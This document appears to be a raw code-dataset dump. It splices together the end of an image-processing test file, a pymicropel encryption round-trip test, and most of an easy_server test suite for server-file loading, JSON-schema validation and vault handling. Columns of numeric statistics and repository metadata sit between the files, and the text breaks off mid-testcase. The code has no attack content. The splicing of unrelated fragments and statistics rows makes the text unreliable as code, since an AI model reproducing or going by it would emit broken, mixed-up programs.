test_case = np.array([[[85, 85, 85, 255], [85, 85, 85, 255], [85, 85, 85, 255], [255, 255, 255, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
[[255, 255, 255, 255], [85, 85, 85, 255], [85, 85, 85, 255], [85, 85, 85, 255]],
[[250, 250, 250, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.gray_scale("", returnable=True) == test_case).all()
def test_invert_color():
io = ImageO("images/test_picture.png")
test_case = np.array([[[0, 255, 255, 255], [255, 0, 255, 255], [255, 255, 0, 255], [0, 0, 0, 255]],
[[255, 255, 255, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]],
[[0, 0, 0, 255], [255, 255, 0, 255], [255, 0, 255, 255], [0, 255, 255, 255]],
[[8, 7, 0, 255], [0, 0, 0, 255], [255, 255, 255, 255], [255, 255, 255, 255]]])
assert (io.invert_color("", returnable=True) == test_case).all()
def test_block():
io = ImageO("images/test_picture.png")
# in this case since it is 4x4 it will just block it by 1 pixel blocks and so not do anything
test_case = np.array([[[255, 0, 0, 255], [0, 255, 0, 255], [0, 0, 255, 255], [255, 255, 255, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
[[255, 255, 255, 255], [0, 0, 255, 255], [0, 255, 0, 255], [255, 0, 0, 255]],
[[247, 248, 255, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.block_image("", returnable=True) == test_case).all()
| 51.328125
| 116
| 0.454033
| 1,060
| 6,570
| 2.751887
| 0.066981
| 0.353788
| 0.333219
| 0.31265
| 0.886184
| 0.851903
| 0.842304
| 0.81385
| 0.729859
| 0.686664
| 0
| 0.359238
| 0.304718
| 6,570
| 127
| 117
| 51.732283
| 0.279335
| 0.021005
| 0
| 0.164557
| 0
| 0
| 0.041804
| 0.041804
| 0
| 0
| 0
| 0
| 0.139241
| 1
| 0.139241
| false
| 0
| 0.025316
| 0
| 0.164557
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
a9aa6670594291b264801f948cbae934042b2ee2
| 1,210
|
py
|
Python
|
pymicropel/test/test_helper/test_crypto.py
|
vkorecky/pymicropel
|
9333ba1d691664a01d0ec63f89ae13956f37d633
|
[
"Apache-2.0"
] | null | null | null |
pymicropel/test/test_helper/test_crypto.py
|
vkorecky/pymicropel
|
9333ba1d691664a01d0ec63f89ae13956f37d633
|
[
"Apache-2.0"
] | null | null | null |
pymicropel/test/test_helper/test_crypto.py
|
vkorecky/pymicropel
|
9333ba1d691664a01d0ec63f89ae13956f37d633
|
[
"Apache-2.0"
] | null | null | null |
"""Test of cryptography."""
from pymicropel.helper.crypto import Crypto
def test_encrypt_decrypt_test():
"""Test encoding and decoding."""
original_str = "Sww=BRDqXPgX5ytH"
exp_str_pass1 = "Ffz7WCI{MAjR hyB"
exp_str_pass999999 = 'Mgf"\\BUnF@vG+ieW'
cryptography = Crypto()
cryptography.crypt_init(1)
encoded_str = cryptography.code_string(original_str)
assert exp_str_pass1 == encoded_str
decoded_str = cryptography.decode_string(encoded_str)
assert original_str == decoded_str
cryptography.crypt_init(999999)
encoded_str = cryptography.code_string(original_str)
assert exp_str_pass999999 == encoded_str
decoded_str = cryptography.decode_string(encoded_str)
assert original_str == decoded_str
cryptography.crypt_init(0)
encoded_str = cryptography.code_string(original_str)
assert original_str == encoded_str
decoded_str = cryptography.decode_string(encoded_str)
assert original_str == decoded_str
cryptography.crypt_init(-1)
encoded_str = cryptography.code_string(original_str)
assert original_str == encoded_str
decoded_str = cryptography.decode_string(encoded_str)
assert original_str == decoded_str
| 32.702703
| 57
| 0.757851
| 151
| 1,210
| 5.715232
| 0.258278
| 0.13905
| 0.12051
| 0.202781
| 0.741599
| 0.741599
| 0.741599
| 0.741599
| 0.741599
| 0.741599
| 0
| 0.024606
| 0.160331
| 1,210
| 36
| 58
| 33.611111
| 0.824803
| 0.040496
| 0
| 0.538462
| 0
| 0
| 0.042609
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 1
| 0.038462
| false
| 0.153846
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a9cb7e9cb15bcd92cff640079317e84253e973d1
| 73,023
|
py
|
Python
|
tests/unittest/test_server_file.py
|
andy-maier/secureserveraccess
|
24f4817b2066401451840b3c7b308e1792eb3e60
|
[
"Apache-2.0"
] | 1
|
2021-03-29T22:09:47.000Z
|
2021-03-29T22:09:47.000Z
|
tests/unittest/test_server_file.py
|
andy-maier/secureserveraccess
|
24f4817b2066401451840b3c7b308e1792eb3e60
|
[
"Apache-2.0"
] | 49
|
2021-03-29T20:13:28.000Z
|
2021-05-01T10:38:19.000Z
|
tests/unittest/test_server_file.py
|
andy-maier/secureserveraccess
|
24f4817b2066401451840b3c7b308e1792eb3e60
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the _server_file.py module.
"""
from __future__ import absolute_import, print_function
import os
import pytest
from easy_server import ServerFile, ServerFileFormatError, \
ServerFileOpenError, ServerFileUserDefinedFormatError, \
ServerFileUserDefinedSchemaError, ServerFileGroupUserDefinedFormatError, \
ServerFileGroupUserDefinedSchemaError
# White box testing: We test an internal function
from easy_server._server_file import _load_server_file
from ..utils.simplified_test_function import simplified_test_function
from ..utils.server_file_utils import easy_server_file
TEST_SERVERFILE_FILEPATH = 'tests/testfiles/server.yml'
TEST_SERVERFILE_FILEPATH_ABS = os.path.abspath(TEST_SERVERFILE_FILEPATH)
TEST_VAULTFILE_FILEPATH = 'tests/testfiles/vault.yml'
TEST_VAULTFILE_FILEPATH_ABS = os.path.abspath(TEST_VAULTFILE_FILEPATH)
# Standard server and vault files that are dynamically created for testing:
TEST_SERVER_FILENAME = 'server.yml'
TEST_VAULT_FILENAME = 'vault.yml'
TEST_VAULT_PASSWORD = 'vault'
FOO_USER_DEFINED_SCHEMA = {
"$schema": "http://json-schema.org/draft-07/schema#",
"title": "FOO - JSON schema for user-defined items in server files",
"type": "object",
"required": [
"foo",
],
"additionalProperties": False,
"properties": {
"foo": {
"type": "string",
"description": "The foo value",
},
},
}
INVALID_USER_DEFINED_SCHEMA = {
"$schema": "http://json-schema.org/draft-07/schema#",
"title": "Invalid JSON schema for user-defined items in server files",
"type": "object_xxx",
"additionalProperties": False,
}
TESTCASES_SF_INIT = [
# Testcases for ServerFile.__init__()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * init_args: Tuple of positional arguments to ServerFile().
# * init_kwargs: Dict of keyword arguments to ServerFile().
# * exp_serverfile_attrs: Dict with expected ServerFile attributes.
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"Order of positional parameters",
dict(
init_args=(
TEST_SERVERFILE_FILEPATH,
),
init_kwargs=dict(),
exp_serverfile_attrs={
'filepath': TEST_SERVERFILE_FILEPATH_ABS,
'user_defined_schema': None,
'group_user_defined_schema': None,
'vault_server_schema': None,
},
),
None, None, True
),
(
"Names of keyword arguments",
dict(
init_args=(),
init_kwargs=dict(
filepath=TEST_SERVERFILE_FILEPATH,
),
exp_serverfile_attrs={
'filepath': TEST_SERVERFILE_FILEPATH_ABS,
'user_defined_schema': None,
'group_user_defined_schema': None,
'vault_server_schema': None,
},
),
None, None, True
),
(
"Omitted required parameter: filepath",
dict(
init_args=(),
init_kwargs=dict(),
exp_serverfile_attrs=None,
),
TypeError, None, True
),
(
"File not found",
dict(
init_args=(),
init_kwargs=dict(
filepath='invalid_file',
),
exp_serverfile_attrs=None,
),
(ServerFileOpenError, "Cannot open server file"),
None, True
),
(
"Server file that references vault file",
dict(
init_args=(),
init_kwargs=dict(
filepath=TEST_SERVERFILE_FILEPATH,
),
exp_serverfile_attrs={
'filepath': TEST_SERVERFILE_FILEPATH_ABS,
'vault_file': TEST_VAULTFILE_FILEPATH_ABS,
'user_defined_schema': None,
'group_user_defined_schema': None,
'vault_server_schema': None,
},
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_INIT)
@simplified_test_function
def test_ServerFile_init(
testcase, init_args, init_kwargs, exp_serverfile_attrs):
"""
Test function for ServerFile.__init__()
"""
# The code to be tested
act_obj = ServerFile(*init_args, **init_kwargs)
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
for attr_name in exp_serverfile_attrs:
exp_attr_value = exp_serverfile_attrs[attr_name]
assert hasattr(act_obj, attr_name), \
"Missing attribute {0!r} in returned ServerFile object". \
format(attr_name)
act_attr_value = getattr(act_obj, attr_name)
assert act_attr_value == exp_attr_value, \
"Unexpected value for attribute {0!r}: Expected {1!r}, got {2!r}".\
format(attr_name, exp_attr_value, act_attr_value)
TESTCASES_SF_LOAD = [
# Testcases for ServerFile._load_server_file()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * user_defined_schema: JSON schema for validating user-defined portion
# of server items in server file, or None.
# * group_user_defined_schema: JSON schema for validating user-defined
# portion of group items in server file, or None.
# * exp_data: Expected result of _load_server_file()
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
# Basic validation
(
"Empty file: Missing required elements",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on top-level element.* is not of type 'object'"),
None, True
),
(
"Invalid YAML syntax: Mixing list and dict",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" - foo\n"
" bar:\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError, "Invalid YAML syntax"),
None, True
),
(
"Invalid top-level type list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="- servers: {}\n"
"- server_groups: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on top-level element: .* is not of type 'object'"),
None, True
),
(
"Missing required 'servers' element",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="server_groups: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on top-level element: 'servers' is a required "
"property"),
None, True
),
(
"Invalid type for 'servers' element: list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" - foo\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'servers': .* is not of type 'object'"),
None, True
),
(
"Invalid type for 'servers' element: string",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: bla\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'servers': .* is not of type 'object'"),
None, True
),
(
"Invalid type for 'server_groups' element: list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups: []\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups': .* is not of type "
"'object'"),
None, True
),
(
"Invalid type for 'server_groups' element: string",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups: bla\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups': .* is not of type "
"'object'"),
None, True
),
(
"Invalid type of server group",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1: invalid\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1': .* is not of type "
"'object'"),
None, True
),
(
"Missing required element 'description' in server group",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" members: []\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1': 'description' is "
"a required property"),
None, True
),
(
"Invalid type for element 'description' in server group: list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: []\n"
" members: []\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1.description': "
".* is not of type 'string'"),
None, True
),
(
"Missing required element 'members' in server group",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1': 'members' is "
"a required property"),
None, True
),
(
"Invalid type for element 'members' in server group: string",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members: invalid\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1.members': "
".* is not of type 'array'"),
None, True
),
(
"Invalid type for server group member: dict",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members:\n"
" - {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1.members.0': "
".* is not of type 'string'"),
None, True
),
(
"Invalid default null",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups: {}\n"
"default: null\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'default': "
"None is not of type 'string'"),
None, True
),
# More semantic errors
(
"Server group member nickname not found",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Nickname 'srv1' in server group 'grp1' not found"),
None, True
),
(
"Default nickname not found",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members:\n"
" - srv1\n"
"default: srv\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Default nickname 'srv' not found"),
None, True
),
# Valid simple server files
(
"Valid file with no servers and server_group+default omitted",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one server that is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"default: srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
'user_defined': {
'stuff': 42,
},
},
},
'server_groups': {},
'default': 'srv1',
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one server and one server group that is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
"default: grp1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
'user_defined': {
'stuff': 42,
},
},
},
'server_groups': {
'grp1': {
'description': 'group1',
'members': ['srv1'],
},
},
'default': 'grp1',
'vault_file': None,
},
),
None, None, True
),
# JSON schema validation of user-defined portion of server items
(
"Valid file with no servers but with FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with two servers that satisfy FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" foo: bar1\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" foo: bar2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
'user_defined': {
'foo': 'bar1',
},
},
'srv2': {
'description': 'server2',
'user_defined': {
'foo': 'bar2',
},
},
},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one server that misses user_defined element and FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedFormatError,
"Missing user_defined element for server srv1"),
None, True
),
(
"Valid file with one server that misses property required in FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedFormatError,
"Invalid format in user-defined portion of item for server srv1.*"
"Validation failed on top-level of user-defined item.*"
"'foo' is a required property"),
None, True
),
(
"Valid file with one server that has incorrect type as per FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" foo: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedFormatError,
"Invalid format in user-defined portion of item for server srv1.*"
"Validation failed on element 'foo'.*"
"42 is not of type 'string'"),
None, True
),
(
"File with one server and invalid FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" foo: bar\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedSchemaError,
"Invalid JSON schema for validating user-defined portion of server "
"items in server file"),
None, True
),
(
"File with no servers and invalid FOO schema (not recognized)",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
# JSON schema validation of user-defined portion of group items
(
"Valid file with no servers but with FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with two groups that satisfy FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined:\n"
" foo: bar1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" user_defined:\n"
" foo: bar2\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
},
},
'server_groups': {
'grp1': {
'description': 'group1',
'user_defined': {
'foo': 'bar1',
},
'members': ['srv1'],
},
'grp2': {
'description': 'group2',
'user_defined': {
'foo': 'bar2',
},
'members': ['srv1'],
},
},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one group that misses user_defined element and FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedFormatError,
"Missing user_defined element for group grp1"),
None, True
),
(
"Valid file with one group that misses property required in FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined: {}\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedFormatError,
"Invalid format in user-defined portion of item for group grp1.*"
"Validation failed on top-level of user-defined item.*"
"'foo' is a required property"),
None, True
),
(
"Valid file with one group that has incorrect type as per FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined:\n"
" foo: 42\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedFormatError,
"Invalid format in user-defined portion of item for group grp1.*"
"Validation failed on element 'foo'.*"
"42 is not of type 'string'"),
None, True
),
(
"File with one server and invalid FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined:\n"
" foo: bar\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedSchemaError,
"Invalid JSON schema for validating user-defined portion of group "
"items in server file"),
None, True
),
(
"File with no groups and invalid FOO schema (not recognized)",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_LOAD)
@simplified_test_function
def test_ServerFile_load(
testcase, server_filename, server_yaml, vault_filename, vault_yaml,
vault_password, user_defined_schema, group_user_defined_schema,
exp_data):
"""
Test function for ServerFile._load_server_file()
"""
with easy_server_file(
server_filename, server_yaml, vault_filename, vault_yaml,
vault_password) as server_filepath:
# The code to be tested
act_data = _load_server_file(
server_filepath, user_defined_schema, group_user_defined_schema)
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
assert act_data == exp_data
TESTCASES_SF_IS_VAULT_FILE_ENCRYPTED = [
# Testcases for ServerFile.is_vault_file_encrypted()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * exp_result: Expected return valoue of is_vault_file_encrypted().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_encrypted=None,
),
None, None, True
),
(
"Decrypted vault file, no password",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n". \
format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=None,
exp_encrypted=False,
),
None, None, True
),
(
"Encrypted vault file, with correct password",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n". \
format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=TEST_VAULT_PASSWORD,
exp_encrypted=True,
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_IS_VAULT_FILE_ENCRYPTED)
@simplified_test_function
def test_SF_is_vault_file_encrypted(
testcase, server_filename, server_yaml, vault_filename, vault_yaml,
vault_password, exp_encrypted):
"""
Test function for ServerFile.is_vault_file_encrypted()
"""
with easy_server_file(
server_filename, server_yaml, vault_filename, vault_yaml,
vault_password) as server_filepath:
esf = ServerFile(server_filepath, vault_password, use_keyring=False,
use_prompting=False)
# The code to be tested
act_encrypted = esf.is_vault_file_encrypted()
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
assert act_encrypted == exp_encrypted
TESTCASES_SF_GET_SERVER = [
# Testcases for ServerFile.get_server()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * nick: nickname input parameter for get_server().
# * exp_server_attrs: Dict with expected attributes of Server result
# of get_server().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'srv' not found"),
None, True
),
(
"One server; non-existing nickname",
